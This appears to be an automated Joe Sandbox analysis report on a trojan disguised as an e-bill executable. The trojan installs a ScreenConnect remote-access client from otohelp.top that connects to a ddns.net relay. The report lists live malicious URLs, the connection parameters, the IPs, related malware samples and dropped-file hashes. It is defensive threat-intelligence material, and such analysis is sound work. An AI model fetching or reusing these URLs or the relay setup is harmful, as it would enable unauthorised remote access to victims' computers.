https://otohelp.top/Bin/ScreenConnect.Client.application	dfsvc.exe, 00000002.00000002.4003051515.0000023CE60C6000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4003675157.0000023CE612B000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4003310166.0000023CE60D3000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.4002687215.0000023CE6050000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC49A000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2386219481.000000001AEB0000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2385257906.00000000023AF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2384641977.000000000070D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2385887426.000000001AE30000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2385257906.00000000023A1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2386097468.000000001AE66000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000006.00000002.2383915676.00000000006AE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.Client.applicationTz	dfsvc.exe, 00000002.00000002.4003310166.0000023CE60D3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.Client.applicationc	dfsvc.exe, 00000002.00000002.4003870164.0000023CE618E000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.Client.application.tio&	ScreenConnect.WindowsClient.exe, 00000006.00000002.2386219481.000000001AEB0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.e	dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmp	false		unknown
http://ocsp.dign	E_BILL0041272508.exe, 00000000.00000003.2526903886.000000000147B000.00000004.00000020.00020000.00000000.sdmp, E_BILL0041272508.exe, 00000000.00000002.2527278235.000000000147B000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.xrml.org/schema/2001/11/xrml2core	dfsvc.exe, 00000002.00000002.3991111838.0000023CCC1C0000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
https://otohelp.top/Bin/ScreenConnect.Client.application$E	dfsvc.exe, 00000002.00000002.4003310166.0000023CE60D3000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.Client.manifestllT	dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://www.w3.or	dfsvc.exe, 00000002.00000002.3991111838.0000023CCC569000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC5CF000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC49A000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://g.live.com/odclientsettings/ProdV21C:	svchost.exe, 00000004.00000003.2142326938.0000027458100000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr	false		unknown
http://crl.ver)	svchost.exe, 00000004.00000002.3767047379.0000027458200000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=mmf351.ddns.net&p=8041&	AYPVIQNL.log.2.dr	false		unknown
https://otohelp.top/Bin/ScreenConnect.Client.manifestq	dfsvc.exe, 00000002.00000002.4002687215.0000023CE6050000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.Client.applicationX	ScreenConnect.WindowsClient.exe, 00000006.00000002.2385257906.00000000023AF000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse	unknown
https://g.live.com/odclientsettings/Prod1C:	edb.log.4.dr	false		unknown
https://otohelp.top/Bin/ScreenConnect.WindowsFileManag	dfsvc.exe, 00000002.00000002.3991111838.0000023CCC6FD000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.Client.applicationml%%	ScreenConnect.WindowsClient.exe, 00000006.00000002.2384641977.000000000070D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://feedback.screenconnect.com/Feedback.axd	ScreenConnect.Core.dll.2.dr	false		unknown
https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exeLMEMH	dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.WindowsC	dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.WindowsBackstageShell.exe.configZaB_	dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.ClientSe	dfsvc.exe, 00000002.00000002.3991111838.0000023CCC789000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.3991111838.0000023CCC64E000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://otohelp.top/Bin/ScreenConnect.WindowsFileManager.exe0	dfsvc.exe, 00000002.00000002.4003870164.0000023CE61C0000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
79.110.49.16	mmf351.ddns.net	Germany		57287	OTAVANET-ASCZ	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523876
Start date and time:	2024-10-02 06:24:20 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	E_BILL0041272508.exe
Detection:	MAL
Classification:	mal72.troj.evad.winEXE@11/68@3/2
EGA Information:	Successful, ratio: 83.3%
HCA Information:	Successful, ratio: 67% Number of executed functions: 228 Number of non-executed functions: 25
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27, 192.229.221.95, 93.184.221.240
Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, cacerts.digicert.com, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, ocsp.digicert.com, e16604.g.akamaiedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, ocsp.edge.digicert.com, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
Execution Graph export aborted for target ScreenConnect.ClientService.exe, PID 1340 because it is empty
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
00:25:34	API Interceptor	5263093x Sleep call for process: dfsvc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
79.110.49.16	E_BILL9926378035.exe	Get hash	malicious	ScreenConnect Tool	Browse
	invoice-benefits-agency9-24-2024.exe	Get hash	malicious	ScreenConnect Tool	Browse
	UhkzPftQIt.exe	Get hash	malicious	ScreenConnect Tool	Browse
	UhkzPftQIt.exe	Get hash	malicious	ScreenConnect Tool	Browse
	D3NM6xht1m.elf	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
otohelp.top	E_BILL9926378035.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.16
	UhkzPftQIt.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.16
	UhkzPftQIt.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.16
mmf351.ddns.net	invoice-benefits-agency9-24-2024.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.16
	UhkzPftQIt.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.16
	UhkzPftQIt.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.16
fp2e7a.wpc.phicdn.net	Scan_doc_09_16_24_1120.exe	Get hash	malicious	ScreenConnect Tool	Browse	192.229.221.95
	E_BILL9926378035.exe	Get hash	malicious	ScreenConnect Tool	Browse	192.229.221.95
	Scan_doc_09_16_24_1203.exe	Get hash	malicious	ScreenConnect Tool	Browse	192.229.221.95
	https://unpaidrefund.top/view/mygov	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	http://tvsurf.jp/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://docs.google.com/forms/d/e/1FAIpQLSdpweVM1inxltc4AWxPatki3D8pgrAZSJz39loK6XS45S8Ubg/viewform?usp=pp_url	Get hash	malicious	Unknown	Browse	192.229.221.95
	http://racrodisaver.co.in/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://www.elightsailorsbank.uksfholdings.com/	Get hash	malicious	Unknown	Browse	192.229.221.95
	https://docs.google.com/presentation/d/e/2PACX-1vRuKBrQqA6BNfxZo0BAmhaaVHWHS5xGpGnvHJ3KKWtc6LdsEuOoWSlBNaOKZjp5GXLjhWJKRMb-grou/pub?start=false&loop=false&delayms=3000	Get hash	malicious	Unknown	Browse	192.229.221.95

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
OTAVANET-ASCZ	E_BILL9926378035.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.16
	invoice-benefits-agency9-24-2024.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.16
	UhkzPftQIt.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.16
	7LC2izrr9u.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.196
	UhkzPftQIt.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.16
	mrKs8EKXbz.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.196
	7LC2izrr9u.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.196
	Statement.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.42
	bin homebots io.bat	Get hash	malicious	Unknown	Browse	79.110.49.144

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	Scan_doc_09_16_24_1120.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.16
	E_BILL9926378035.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.16
	D0WmCTD2qO.bat	Get hash	malicious	Unknown	Browse	79.110.49.16
	c5WMpr1cOc.bat	Get hash	malicious	Unknown	Browse	79.110.49.16
	Scan_doc_09_16_24_1203.exe	Get hash	malicious	ScreenConnect Tool	Browse	79.110.49.16
	404.exe	Get hash	malicious	Unknown	Browse	79.110.49.16
	jD1RqkyUNm.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	79.110.49.16
	NhtSITq9Zp.vbs	Get hash	malicious	Remcos	Browse	79.110.49.16
	e6y2SzRzyr.vbs	Get hash	malicious	PureLog Stealer	Browse	79.110.49.16

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe	Scan_doc_09_16_24_1120.exe	Get hash	malicious	ScreenConnect Tool	Browse
	E_BILL9926378035.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Scan_doc_09_16_24_1203.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Scan_PDF_5255303072.exe	Get hash	malicious	ScreenConnect Tool	Browse
	invoice-benefits-agency9-24-2024.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Scan_PDF_2017163298.exe	Get hash	malicious	ScreenConnect Tool	Browse
	He6pI1bhcA.exe	Get hash	malicious	ScreenConnect Tool	Browse
	5eRyCYRR9y.exe	Get hash	malicious	ScreenConnect Tool	Browse
	VD01NDHM8u.exe	Get hash	malicious	ScreenConnect Tool	Browse
C:\Users\user\AppData\Local\Apps\2.0\N5RWKL9C.2MA\OAPVKWJD.WRW\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	Scan_doc_09_16_24_1120.exe	Get hash	malicious	ScreenConnect Tool	Browse
	E_BILL9926378035.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Scan_doc_09_16_24_1203.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Scan_PDF_5255303072.exe	Get hash	malicious	ScreenConnect Tool	Browse
	invoice-benefits-agency9-24-2024.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Scan_PDF_2017163298.exe	Get hash	malicious	ScreenConnect Tool	Browse
	He6pI1bhcA.exe	Get hash	malicious	ScreenConnect Tool	Browse
	5eRyCYRR9y.exe	Get hash	malicious	ScreenConnect Tool	Browse
	VD01NDHM8u.exe	Get hash	malicious	ScreenConnect Tool	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Network\Downloader\edb.chk

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	0.35901589905449205
Encrypted:	false
SSDEEP:	6:6xKdoaaD0JOCEfMuaaD0JOCEfMKQmDCexKdoaaD0JOCEfMuaaD0JOCEfMKQmDC:6aaD0JcaaD0JwQQHaaD0JcaaD0JwQQ
MD5:	C788EDB928436D0CE10A5BF198837D8A
SHA1:	F104B6AB797E0B16362BFB69F5000407CE6EFFD8
SHA-256:	E309925E38D727B91C5B0AD9FC86A778ECD0EBE80261F55E870AD6685B0CC0BD
SHA-512:	61F750C97F2E1EAF623486147F55B4BF39C34DF28DD124FA378973965A2AE0AAA967D71C88BE0D02E1B2D2B22E20199B9E817BE793A10C0CC9D12FE703E18CF2
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	*.>...........k.....D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................................................k.............................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7304198281847039
Encrypted:	false
SSDEEP:	1536:9J8s6YR3pnhWKInznxTgScwXhCeEcrKYSZNmTHk4UQJ32aqGT46yAwFM5hA7yH03:9JZj5MiKNnNhoxuC
MD5:	CF5C187095946D3CECEBF5DC8DE00B25
SHA1:	86767DFAE9E16A69102E8DCEC5AE25D7A8B121A6
SHA-256:	BDD291D4C0C5937569DB54A40F2B85F730E22A05E27D3ABC17B32E94D712AACD
SHA-512:	4438F4DF13F556D3C83F368BA3E5C98DEAB54B283AEB876C60AB5E78840502D9BD364CEA0DB4C225091B5311453F0C56887201A4AB53C09CB94646C6517D883C
Malicious:	false
Reputation:	low
Preview:	...........@..@9....{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................Fajaj.#.........`h.................h.......6.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage user DataBase, version 0x620, checksum 0x4e1f490b, page size 16384, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.6291147950443163
Encrypted:	false
SSDEEP:	1536:HSB2ESB2SSjlK/HZH03N9Jdt8gYkr3g16l2UPkLk+kDWyrufTRryrUOLUzCJ:Haza9iJa+2UtmOQOL
MD5:	29809A948B3040D6084ECFC43CDA01D0
SHA1:	6D273F7E68225B76FDB2DEAF21577C673530DCA4
SHA-256:	79DB1CF0BD007DA239E46799B7EBE724D9A5D39E31904BE3CE98786BE760E0C7
SHA-512:	46069BF47AB84859C166DF45AE8F71BFD25BE5B4EE0965ED7D43A68BE24D760F2718D44B1419AA08C31F66FCB067AE66EE7711F2C2D4A13E5784FC2E6FBE3FC0
Malicious:	false
Reputation:	low
Preview:	N.I.... .......P.......X\...;...{......................0.j..........\|.......\|?.h.g..........\|..0.j.........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................U.......\|..................f..?.....\|...........................#......0.j.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.08011597908142432
Encrypted:	false
SSDEEP:	3:FlllWetYeewB4i8/PdzpmPv8/illHol///lZMPCyH:FtTzRdPxpo5
MD5:	F8ED7BCFB9C6713E7413EDD6FA58A83B
SHA1:	80CC793252821AEF2E805D7D45DA760FEEC32375
SHA-256:	4077ED26CA7A8FE1F9C9A7296637B8F0C4F6DEB8B94E6C9B896EC69934747C6D
SHA-512:	46562005865A37C493AA83C3BDC94B7CFAB0E5448E762F2A18AA91CAC11D64BDCE7875851865CDA7EEDA85E86FA849F40E00428746C2FBAF2408AE986E12AC04
Malicious:	false
Preview:	.O.#.....................................;...{.......\|?......\|...............\|.......\|..<bW......\|q.................f..?.....\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1716
Entropy (8bit):	7.596259519827648
Encrypted:	false
SSDEEP:	48:GL3d+gG48zmf8grQcPJ27AcYG7i47V28Tl4JZG0FWk8ZHJ:GTd0PmfrrQG28cYG28CEJ
MD5:	D91299E84355CD8D5A86795A0118B6E9
SHA1:	7B0F360B775F76C94A12CA48445AA2D2A875701C
SHA-256:	46011EDE1C147EB2BC731A539B7C047B7EE93E48B9D3C3BA710CE132BBDFAC6B
SHA-512:	6D11D03F2DF2D931FAC9F47CEDA70D81D51A9116C1EF362D67B7874F91BF20915006F7AF8ECEBAEA59D2DC144536B25EA091CC33C04C9A3808EEFDC69C90E816
Malicious:	false
Preview:	0...0............@.`.L.^.....0....H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...210429000000Z..360428235959Z0i1.0...U....US1.0...U....DigiCert, Inc.1A0?..U...8DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA10.."0....H.............0........./B.(.x.].9Y...B.3..=..p..&0...h.\..4$..KO.xC........g.RO..W.......>Mp$d....}4}L.W.kC....;....GZ..L.. %............e....I5.=Q..!xE...,.......IpB2......eh..ML..HRh....W]...e...O.,H.V.5........7.....\|...2........t..9..`.....1.......#GG...n..m.....jg-.D......;...2Z..j`T.I....\.o.&....8........o.a4\..E(.6*f(_.s.&%....\...L.b.^3........+..6y.....u.e..HP.w....P.F.aX..\|..<.(.9....S..G.u0..0.v..[K]taM?..v.X.r.)A...m&vh.A.X..&+..MY.x.J>@G_.Ps..#!Y`.dT..!..8.\|f..x8E0.O.cOL....SA\|X=G....2...l<.V.........Y0..U0...U.......0.......0...U......h7..;._....a{..e.NB0...U.#..0.......q]dL..g?....O0...U...........0...U.%..0...+.......0w..+........k0i0$..+.....0...http:/

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	727
Entropy (8bit):	7.552295515462603
Encrypted:	false
SSDEEP:	12:5onfZHlc5RlRtBfQtlUxsywrhX0DHXXD6svZJ7YCSVXAdaAaN7tEn/BTGpq78S5z:5iplcdZslUxWQWSiVXAD2ZEZic8wz
MD5:	D3E1E6C22706565D07C5B9CF083E39F6
SHA1:	12D3BC9406E47A98818A8E21DEEED08DAF79B029
SHA-256:	AA5381F9A094B86DEE378100BA11AF301FA9B2E0B5E508D6023E06CCD3A2A60B
SHA-512:	BCA97221A6320F9C29A237D2F6FD824713072549F2EB879C963D2C8326493FCD03CEB3B94E737ADE4A312CB8331B14865F2F208A73F566A6E08786577FE3B273
Malicious:	false
Preview:	0..........0.....+.....0......0...0..........q]dL..g?....O..20240930184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20240930184215Z....20241007184215Z0....H.............X.Z..hT.F...^.g..n......W.%T.;~.\|LU.......aCW...[....-.k.F..)C........@..:.3)....^.4....G.R.PD...#Z...7@..!Ub....<.J..vXE...6..I........6..H.'.@.1l..v..]P....tm!..............z..!...%7^[...)..p..Vzn....ML.....]].KN\|...tF.8.cN....bt.9..Q.......e.T@.8A..A.uN..1.4.....U.x}n..F....g..\|.......P.\|...G......:.F.w,....mj.kj>..2=9..Q.J..#..Jc......O.....a....Z...f....e.^.=...$`.~Z;u.?8..!@...J<e.tiTg.....qzDe.hn.......b...Xy...S.FE....=Q.....~.p\|5.6....KN..p.6y..\K........:.T.......q.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1428
Entropy (8bit):	7.688784034406474
Encrypted:	false
SSDEEP:	24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
MD5:	78F2FCAA601F2FB4EBC937BA532E7549
SHA1:	DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
SHA-256:	552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
SHA-512:	BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
Malicious:	false
Preview:	0...0..x..........W..!2.9...wu\0....H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0....H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...sn..\|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..\|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0....H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.141785112603811
Encrypted:	false
SSDEEP:	6:kKAFE/99UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:5kDnLNkPlE99SNxAhUe/3
MD5:	6C676BA5935757B586AB03647676E327
SHA1:	39F80D1CA002134F9BF7EE180358A9F1E886E910
SHA-256:	4F70584D32410E9FFB9ABDBDEDA7B1A9687883B9441649A5D2D83074B632FE60
SHA-512:	9C5343D222C09297C1D0F45040AA025E3D140DA31367A98FBE487C1BEC4D5720CF21FC7A193645DED4290A3657BD78E020FB962BA677B937B682F90AD7606403
Malicious:	false
Preview:	p...... ........}h......(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	data
Category:	dropped
Size (bytes):	308
Entropy (8bit):	3.2220888806886414
Encrypted:	false
SSDEEP:	6:kKXeFzNcalgRAOAUSW0P3PeXJUwh8lmi3Y:/eYtWOxSW0P3PeXJUZY
MD5:	5653E2C060F0292ED42A0F54E0C3FA6D
SHA1:	A650D13DAF2C536CFE82297F9C6A763CC57798C5
